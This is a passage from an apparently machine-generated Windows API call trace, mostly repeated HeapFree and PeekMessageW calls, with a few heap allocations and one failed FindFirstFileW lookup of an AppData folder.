hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.803] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0199.803] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad58 | out: hHeap=0x8a0000) returned 1 [0199.803] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dafd0 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f88 | out: hHeap=0x8a0000) returned 1 [0199.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ef3b0 | out: hHeap=0x8a0000) returned 1 [0199.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b90 | out: hHeap=0x8a0000) returned 1 [0199.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e80 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e50 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b40 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9eb0 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e98 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2b18 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c10 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f28 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f10 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c00 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ec8 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f40 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x909280 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c30 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ef8 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ee0 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9092f8 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ba0 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e20 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dc0 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x909380 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1bb0 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d30 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e53b0 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1bc0 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dd8 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9da8 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7c58 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1be0 | out: hHeap=0x8a0000) returned 1 [0199.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b08 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9df0 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e5468 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1bf0 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e08 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7d00 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1bd0 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9bc8 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d00 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7dc8 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c50 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba678 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e5520 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ca0 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d48 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6a8 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7e90 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c80 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c88 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a48 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee3c8 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c70 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d78 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d18 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7f28 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c90 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6f0 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7fc0 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba738 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0199.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8058 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c60 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8100 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ce0 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba798 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee450 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba840 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8198 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d60 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba768 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7c8 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ec3b8 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e00 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba828 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7e0 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee4d8 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba810 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee560 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7f8 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba858 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee5e8 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba888 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba7b0 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8230 | out: hHeap=0x8a0000) returned 1 [0199.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8b8 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba870 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e82a8 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba900 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906038 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d20 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba948 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba918 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee670 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e20 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba930 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee6f8 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e60 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba9c0 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba960 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee780 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba9a8 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baa38 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9060b0 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d10 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba990 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba9f0 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee808 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba9d8 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baa20 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906128 | out: hHeap=0x8a0000) returned 1 [0199.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baa08 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba978 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9061a0 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baa68 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baa50 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906218 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1e30 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bab40 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baae0 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e55d8 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baa98 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baaf8 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907020 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baab0 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bab10 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906290 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cf0 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baac8 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bab28 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f7f48 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bab58 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baa80 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f7ff0 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9babd0 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bab88 | out: hHeap=0x8a0000) returned 1 [0199.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ec450 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baba0 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bab70 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ec4e8 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ef0 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac00 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac30 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee890 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac60 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac48 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906308 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1de0 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9babb8 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac18 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee918 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ee0 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac90 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bacc0 | out: hHeap=0x8a0000) returned 1 [0199.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906380 | out: hHeap=0x8a0000) returned 1 [0199.811] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.811] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.811] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0199.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de808 [0199.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0a8 [0199.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0199.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b80 [0199.812] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\AppData", lpFindFileData=0x87f5a8 | out: lpFindFileData=0x87f5a8*(dwFileAttributes=0x7, ftCreationTime.dwLowDateTime=0x8a0000, ftCreationTime.dwHighDateTime=0xfffffffe, ftLastAccessTime.dwLowDateTime=0x7738e36c, ftLastAccessTime.dwHighDateTime=0x7dc02d6, ftLastWriteTime.dwLowDateTime=0x4611d, ftLastWriteTime.dwHighDateTime=0x30, nFileSizeHigh=0x1, nFileSizeLow=0x0, dwReserved0=0x8a0000, dwReserved1=0x9bf310, cFileName="愝\x04", cAlternateFileName="")) returned 0xffffffff [0199.813] PeekMessageW 